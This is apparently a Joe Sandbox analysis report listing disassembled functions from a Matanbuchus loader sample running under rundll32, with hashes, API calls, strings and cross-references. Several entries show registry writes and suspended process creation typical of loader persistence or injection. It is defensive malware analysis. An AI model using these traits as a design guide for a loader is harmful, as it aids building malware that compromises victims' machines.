Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: E51171BF2E518243D303863DD4B05AFE7B5EFD52297688F79D05B8B65CD322D0419600

Function 7EE77A0D Relevance: .0, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b188892764ef48b31e99d50f9fffab4c0857ad2ff1ffd25338ab321c9fd8119
Instruction ID: 0deb8fca146ab8214929fe796665ed6f808895c7004ccc9f509c672cfae50dc1
Opcode Fuzzy Hash: 0b188892764ef48b31e99d50f9fffab4c0857ad2ff1ffd25338ab321c9fd8119
Instruction Fuzzy Hash: AFF09037664260DBE702CA5DC514B4973ACFB06A16F115866FA42EB254C6A0DF40D7C0

Function 7EE5F610 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
Instruction ID: 087810ec7eefa3f09686092f5045ec51e49a5e746bf106b36be16316c9d6fbd8
Opcode Fuzzy Hash: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
Instruction Fuzzy Hash: 51F0A43A9156189BCB61DB69CC44F97B3BCEB40250F000DA1E556E3225E770FD65CAC0

Function 7EE77998 Relevance: .0, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71b6c43b8f5237d8a665215d6be7d40c31d0e07710d28b70277c9855643d0f7
Instruction ID: ac0c8865aaf69298fe992f5d6d4ed3070f6473a5473be9f08ced715fd8ff6d2d
Opcode Fuzzy Hash: b71b6c43b8f5237d8a665215d6be7d40c31d0e07710d28b70277c9855643d0f7
Instruction Fuzzy Hash: E9F06536622264DBCB16DB4CC544B4973FDEB45B55F220466F542EB240D7B4DD00C7D0

Function 7EE779DC Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
Instruction ID: 1c4a586bb20c369f877ad3de664869d54031489ea452c9304f0c6e4e448ecfe1
Opcode Fuzzy Hash: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
Instruction Fuzzy Hash: 5AE08C32A222B8EBCB12DBD8D904D8AB3FCEB49A11B1108A6B902D3100D370DF00C7C0

Function 7EE707C8 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
Instruction ID: 40dcf873500239b02f1d68ada685da700b6130f3c6e21e02c66c5c661c1b8a4a
Opcode Fuzzy Hash: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
Instruction Fuzzy Hash: 57C04C3C163A818ACF16D9108E71BA93369A79268EF901CDDC9074FA41D91E9C86DF51

Function 7EE2E5A0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80

Function 7EE4E1B0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880

Function 7EE26570 Relevance: 25.7, APIs: 4, Strings: 13, Instructions: 244COMMON

Download Yara Rule

Strings

>, xrefs: 7EE265D3
7, xrefs: 7EE265C7
7, xrefs: 7EE265CF
u, xrefs: 7EE265DB
1, xrefs: 7EE265BB
*, xrefs: 7EE265C3
w, xrefs: 7EE265EB
;, xrefs: 7EE265BF
ivh, xrefs: 7EE2661E
i, xrefs: 7EE265EF
X, xrefs: 7EE265B3
+, xrefs: 7EE265CB
,, xrefs: 7EE265D7

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
API String ID: 0-285284801
Opcode ID: 9b7fc8cce72f5e0a7549926a22aaafba4476026510ee7c3044601d99cf3b0d23
Instruction ID: f326c789d19b4229f3355f064bf05704da3e419286920ba0191cf1952240e653
Opcode Fuzzy Hash: 9b7fc8cce72f5e0a7549926a22aaafba4476026510ee7c3044601d99cf3b0d23
Instruction Fuzzy Hash: 2DB17674D08289DFEB01CF98D884BDEBBB5BF48308F104669E845BB380D7B55A45CB61

Function 7EE6ECAE Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 402COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7EE6ED54
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7EE6ED78

Strings

..., xrefs: 7EE6EDD3, 7EE6EEF6, 7EE6EF45, 7EE6F089, 7EE6F10C, 7EE6F13F
(Press Retry to debug the application - JIT must be enabled), xrefs: 7EE6F0E2
Assertion failed!, xrefs: 7EE6ECD2
\, xrefs: 7EE6EE75
Line: , xrefs: 7EE6EF95
Program: , xrefs: 7EE6ED16
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 7EE6F0B8
<program name unknown>, xrefs: 7EE6ED82
Expression: , xrefs: 7EE6F00F
File: , xrefs: 7EE6EE1E

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 4146042529-3261600717
Opcode ID: f2b46b2d9ac96969b0b3fcd6bf091d66812d81090e5606018595f2cc7ed85b3c
Instruction ID: f814ca40beeb02d52524a6926b43c30f6bd72faf1d9d87e8c12c66ef2d26d773
Opcode Fuzzy Hash: f2b46b2d9ac96969b0b3fcd6bf091d66812d81090e5606018595f2cc7ed85b3c
Instruction Fuzzy Hash: 78C1363CA5110A67D7119E24CD49FDB73799F8434CF080EA8ED0AD625AF7319B56CAA0

Function 7EE0C1A0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 353COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 7EE0C45B

Strings

d, xrefs: 7EE0C445
d, xrefs: 7EE0C39C
B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EE0C27E, 7EE0C424
x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7EE0C283
d, xrefs: 7EE0C2E0
@, xrefs: 7EE0C40D
n_chars < number_buffer.size() - 1, xrefs: 7EE0C429

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aullrem
String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
API String ID: 3758378126-3644039597
Opcode ID: b04d480bb9cdade4601909a89fbb21d12a4f6d71b4cdfbba7cc0432ac24015c6
Instruction ID: 7393c950da201d7c817ad91db7bef2da544dc960551ab3eb711f3f3dcd2bf6b3
Opcode Fuzzy Hash: b04d480bb9cdade4601909a89fbb21d12a4f6d71b4cdfbba7cc0432ac24015c6
Instruction Fuzzy Hash: 33F1F278E10219DFDB14CF98C890BDDBBB2BF88304F2089AAD919A7354D7746A85CF54

Function 7EE0C650 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 7EE0C89A
__aulldiv.LIBCMT ref: 7EE0C8AE

Strings

d, xrefs: 7EE0C71F
false, xrefs: 7EE0C6D5
B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EE0C6D0, 7EE0C863
@, xrefs: 7EE0C84C
d, xrefs: 7EE0C884
n_chars < number_buffer.size() - 1, xrefs: 7EE0C868
d, xrefs: 7EE0C7DB

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aulldiv__aullrem
String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
API String ID: 3839614884-178659603
Opcode ID: 06f8c68d77be1b35b11569510e8c58ef0ba15df609b8a7783599e86d946b053a
Instruction ID: 74e694b0c9a22eac8c746923af332f9fb62a8ea8c58d0dd24826fcd7b9db01bc
Opcode Fuzzy Hash: 06f8c68d77be1b35b11569510e8c58ef0ba15df609b8a7783599e86d946b053a
Instruction Fuzzy Hash: EDE1D278E01219DFDB15CFA8C880B9DBBB2FF48304F2485AAD919AB354D7306A81CF55

Function 7EE5EF10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7EE5EF39
wsprintfW.USER32 ref: 7EE5EF86
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7EE5EFA3
RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7EE5EFC4
RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7EE5EFE4
RegCloseKey.ADVAPI32(00000000), ref: 7EE5EFFD
RegCloseKey.ADVAPI32(00000000), ref: 7EE5F008

Part of subcall function 7EE5F6E7: GetTickCount.KERNEL32 ref: 7EE5F705

Strings

kkk, xrefs: 7EE5EFDC
SOFTWARE, xrefs: 7EE5EF2C
%s_%x%x, xrefs: 7EE5EF80
bbb, xrefs: 7EE5EFBC

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseValue$CountCreateOpenTickwsprintf
String ID: %s_%x%x$SOFTWARE$bbb$kkk
API String ID: 730945307-550109914
Opcode ID: 43ffea26892a81b51e7f565058048cfaf02fccdf1a0c10a489c7b44b04994b54
Instruction ID: f0eddbf298782614dad57b176b2bc998030cd5b5db8fcd65928a4fe401d5f758
Opcode Fuzzy Hash: 43ffea26892a81b51e7f565058048cfaf02fccdf1a0c10a489c7b44b04994b54
Instruction Fuzzy Hash: 5E316B76A00218BADB219B95CC49FDFBF7DEF04354F100865F609E6160D731AA84DBA0

Function 7EE5F11C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 7EE5F149
IsWow64Process.KERNEL32(00000000), ref: 7EE5F150
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7EE5F18C
wsprintfW.USER32 ref: 7EE5F21A
CloseHandle.KERNEL32(00000000), ref: 7EE5F3A5
CloseHandle.KERNEL32(00000000), ref: 7EE5F3B0

Strings

?, xrefs: 7EE5F1B2
0x%x, xrefs: 7EE5F214

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
String ID: 0x%x$?
API String ID: 3386633596-4137330559
Opcode ID: fb128954a2bc5dae2ad7925a59004916a8f4b5508a07a7b30947a9e1d870f3fe
Instruction ID: d4148ad71a29fa617f0eada25c22b0a89b56abae2b43a31a3630fa66ff030f59
Opcode Fuzzy Hash: fb128954a2bc5dae2ad7925a59004916a8f4b5508a07a7b30947a9e1d870f3fe
Instruction Fuzzy Hash: 54813DB6D15108BFEF11DBA4CD85EEEB7BDEF08248F100865E905E2250E7359E64CB60

Function 7EE641B1 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 7EE642D0
___TypeMatch.LIBVCRUNTIME ref: 7EE643DE
_UnwindNestedFrames.LIBCMT ref: 7EE64530
CallUnexpected.LIBVCRUNTIME ref: 7EE6454B

Strings

csm, xrefs: 7EE6425B
csm, xrefs: 7EE641EE
csm, xrefs: 7EE64307

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 37c831f3c67b91c1a0eccd4b03fe8c5f8e828f6780a08f1d6264bd84407a97e2
Instruction ID: 3d7ac4091126e5aa4dc39e112305ae073248e7250b4741c11762f6f1c4dc02cf
Opcode Fuzzy Hash: 37c831f3c67b91c1a0eccd4b03fe8c5f8e828f6780a08f1d6264bd84407a97e2
Instruction Fuzzy Hash: 0FB1CE79891209EFCF06CFA4D88099EBBB6FF14318F104D5AE8126B215D731DA51CFA1

Function 6C55FE80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6C55FEB7
___except_validate_context_record.LIBVCRUNTIME ref: 6C55FEBF
_ValidateLocalCookies.LIBCMT ref: 6C55FF48
__IsNonwritableInCurrentImage.LIBCMT ref: 6C55FF73
_ValidateLocalCookies.LIBCMT ref: 6C55FFC8

Strings

csm, xrefs: 6C55FF5D
csm, xrefs: 6C55FFF1

Memory Dump Source

Source File: 00000004.00000002.4167745334.000000006C531000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000004.00000002.4167717678.000000006C530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167772525.000000006C56B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167791880.000000006C57A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167864734.000000006C78D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167962728.000000006CA27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167982575.000000006CA28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c530000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: cdd15d443275acc577e573949ce414b377971211c5696fd85cfcadfa0e8e7ef1
Instruction ID: 1826d4d07e5519c41ffff33572b56e0d6fb1689e04736b0c6bf54457acf2a08f
Opcode Fuzzy Hash: cdd15d443275acc577e573949ce414b377971211c5696fd85cfcadfa0e8e7ef1
Instruction Fuzzy Hash: 8B51B234A01204DFCF00DF6ACC44AAE7BB5EF82328F54829AE8159BF61D732D955CB95

Function 7EE805F3 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7EE7FF5F), ref: 7EE8060C

Strings

sqrt, xrefs: 7EE8074B
pow, xrefs: 7EE806AA, 7EE80754, 7EE807A1
asin, xrefs: 7EE80739
log10, xrefs: 7EE8064E, 7EE8065D
log, xrefs: 7EE80669, 7EE80678
acos, xrefs: 7EE80742

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$log$log10$pow$sqrt
API String ID: 3527080286-3190521889
Opcode ID: 58e7764e58911ded0b0b08e6d1545949e43d952fa9779d627f97352678c89430
Instruction ID: 73df8960647e8134e1e42638f58216cf80eb5a4e32dd6d629b44abbebeb8d11a
Opcode Fuzzy Hash: 58e7764e58911ded0b0b08e6d1545949e43d952fa9779d627f97352678c89430
Instruction Fuzzy Hash: 0751D27D81060ACBEB01AFA6E8581AD7FB4FF4530CF112C85D9CAA666CCB358561CF45

Function 7EE5C5A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 206COMMON

Download Yara Rule

APIs

IsCharLowerA.USER32(00000073), ref: 7EE5C78A
GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7EE5C7AA

Strings

9mD, xrefs: 7EE5C7EE
{, xrefs: 7EE5C63C
kernel32, xrefs: 7EE5C7A3
u, xrefs: 7EE5C6D5

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: CharFileLowerModuleName
String ID: 9mD$kernel32$u${
API String ID: 515556390-2230072418
Opcode ID: aee441f5033567c8574c2d515e8c760909114ed0c7bc97b4dc1a0229c1caed57
Instruction ID: 5550e44cf310a7ea6c6a53d9baa0c86470a03d40a5137fcaa924d0bcea5ac569
Opcode Fuzzy Hash: aee441f5033567c8574c2d515e8c760909114ed0c7bc97b4dc1a0229c1caed57
Instruction Fuzzy Hash: 24B147B9D05298CEDB10CFAAC85079DBBF5BB48300F20899AD459BB365D7341A81CF66

Function 6C554C40 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6C554DE7

Strings

(, xrefs: 6C554D03
8, xrefs: 6C554DA3
GB, xrefs: 6C554D7B
?2, xrefs: 6C554D13
r, xrefs: 6C554DBC

Memory Dump Source

Source File: 00000004.00000002.4167745334.000000006C531000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000004.00000002.4167717678.000000006C530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167772525.000000006C56B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167791880.000000006C57A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167864734.000000006C78D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167962728.000000006CA27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167982575.000000006CA28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c530000_rundll32.jbxd

Similarity

API ID: DirectorySystem
String ID: ($8$?2$GB$r
API String ID: 2188284642-435796455
Opcode ID: 8b1cb5ccd67101a5ba95ac7e00e9c085cad2417a978e9d393291a45d7c4ea673
Instruction ID: f5b32791faa3a58d42d3772086f0c353dd6f898986eec92536bb1a2cfe74524d
Opcode Fuzzy Hash: 8b1cb5ccd67101a5ba95ac7e00e9c085cad2417a978e9d393291a45d7c4ea673
Instruction Fuzzy Hash: 79713F74A042A8CFDF16CFA9C8455ADBFF1BB4A300F15915AD458E7381E7348685CF29

Function 7EE63BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 7EE63C17
___except_validate_context_record.LIBVCRUNTIME ref: 7EE63C1F
_ValidateLocalCookies.LIBCMT ref: 7EE63CA8
__IsNonwritableInCurrentImage.LIBCMT ref: 7EE63CD3
_ValidateLocalCookies.LIBCMT ref: 7EE63D28

Strings

csm, xrefs: 7EE63CBD

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 8868c63fe5bb0051041492e9338f4bb9823521650b8ec8d2d18a73d212cdd6eb
Instruction ID: 6a015d88026376b0f9362ef276074af79b62249b3cf680a73e040dc1444a3416
Opcode Fuzzy Hash: 8868c63fe5bb0051041492e9338f4bb9823521650b8ec8d2d18a73d212cdd6eb
Instruction Fuzzy Hash: 9441C53CA502199BCF00CF69C884A9EBBB5FF85328F108965EC1A9B351D731DA05CBA1

Function 6C55CEF0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6C55D09A
Sleep.KERNEL32(00000064), ref: 6C55D0A7

Strings

Z, xrefs: 6C55CFB0
t, xrefs: 6C55CF47
), xrefs: 6C55CF7A
X, xrefs: 6C55CF51

Memory Dump Source

Source File: 00000004.00000002.4167745334.000000006C531000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000004.00000002.4167717678.000000006C530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167772525.000000006C56B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167791880.000000006C57A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167864734.000000006C78D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167962728.000000006CA27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167982575.000000006CA28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c530000_rundll32.jbxd

Similarity

API ID: DirectorySleepWindows
String ID: )$X$Z$t
API String ID: 1499897475-3436847989
Opcode ID: 456fddd2eb4b1563c74d6dfc20397055cdaa280f50d20e37db3ad4c24f19dc27
Instruction ID: ed09e23e6f100bae34defb5868104952c345ca58fc2f3fb1aa9c5d5c4f274d28
Opcode Fuzzy Hash: 456fddd2eb4b1563c74d6dfc20397055cdaa280f50d20e37db3ad4c24f19dc27
Instruction Fuzzy Hash: BA5127B4E043A8CEEF15DFA9C84469DBBB1FF5A300F1091A9D458A7351E3344A85CF29

Function 7EE53E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 7EE53EFF
std::bad_exception::bad_exception.LIBCMTD ref: 7EE53F19
std::bad_exception::bad_exception.LIBCMTD ref: 7EE53F33
std::bad_exception::bad_exception.LIBCMTD ref: 7EE53F4D

Strings

false, xrefs: 7EE53F6E
B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EE53F69

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
API String ID: 2160870905-4036550669
Opcode ID: 2f22f99044fbf95117636e484cd82cef32790fff49e479a6b13a973fb926a170
Instruction ID: f23dd1599dfcdb2fa093b412af05ce86e71feb64e09549b3cec3b214c04fc13d
Opcode Fuzzy Hash: 2f22f99044fbf95117636e484cd82cef32790fff49e479a6b13a973fb926a170
Instruction Fuzzy Hash: F621A379A05209EBCB08DFA4CC80DDE77B5AF45300F148E5DF9152B244DF31AA58DB25

Function 7EE53D60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 7EE53DDF
std::bad_exception::bad_exception.LIBCMTD ref: 7EE53DF9
std::bad_exception::bad_exception.LIBCMTD ref: 7EE53E13
std::bad_exception::bad_exception.LIBCMTD ref: 7EE53E2D

Strings

false, xrefs: 7EE53E4E
B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EE53E49

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
API String ID: 2160870905-4036550669
Opcode ID: f3082fc45d6bc1814cbd569dc98ca0f3a0a76af2702cdf2cd9f9363966ad74ac
Instruction ID: 0dc09f09ff40bc9f11b394a436e2617ea57ec4e8a281e30ad8bbaf05853b2f3d
Opcode Fuzzy Hash: f3082fc45d6bc1814cbd569dc98ca0f3a0a76af2702cdf2cd9f9363966ad74ac
Instruction Fuzzy Hash: DE21A379A05209EBCB04CFA4CC80EDE73B6AF55300F148E5DF5162B244DF31AA58DB15

Function 7EE7402E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,7EE7413B,7EE71108,0000000C,7EE852A0,00000000,00000000,?,7EE74388,00000021,FlsSetValue,7EE8D860,7EE8D868,7EE852A0), ref: 7EE740EF

Strings

ext-ms-, xrefs: 7EE74099
api-ms-, xrefs: 7EE74085

Memory Dump Source

